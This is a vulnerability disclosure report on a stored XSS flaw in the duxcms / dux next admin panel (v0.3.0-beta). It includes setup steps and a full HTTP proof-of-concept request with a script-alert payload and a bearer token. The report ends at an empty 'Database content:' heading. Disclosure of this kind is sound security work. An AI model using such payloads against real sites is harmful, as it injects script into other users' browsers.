There is a storage XSS vulnerability in the creation of articles in duxcms or dux next background.

[czheisenberg]

Company name: 湖南聚匠信息科技有限公司 Project official website: https://www.dux.cn/. Project address: https://github.com/duxweb/duxcms. Project name: duxcms or dux next. Affected version: v0.3.0-beta

Vulnerability description:

There is a storage XSS vulnerability when creating articles in the background.

准备工作：

1. 登入后台。
2. 内容管理——>文章分类（新建一个分类）——>文章列表——>创建 Preparatory work:
3. Log in backstage.
4. Content management-- > article classification (create a new category)-- > article list-- > create

insert xss payload

POC:

POST http://192.168.1.132/admin/content/article HTTP/1.1
Host: 192.168.1.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTcxODE3MzI1MCwiZXhwIjoxNzE4MjU5NjUwLCJpZCI6MX0.lGzXsCh5Id5aerGPKCEX5UYAipMn8wdu6LWr3BnJJWA
Content-Length: 166
Origin: http://192.168.1.132
Connection: close
Referer: http://192.168.1.132/manage/
Priority: u=1

{"status":true,"images_auto":true,"images":[],"descriptions":"","keywords":[],"content":"<p>&lt;script&gt;alert('xss')&lt;/script&gt;</p>","title":"xss","class_id":1}

Go back to the home page:

The XSS vulnerability will be triggered when you click on the newly created article.

The detailed page of the article will also trigger: http://192.168.1.132/page/article-info/1233. The ID created here is 1233, and the actual ID is based on your environment.

Database content: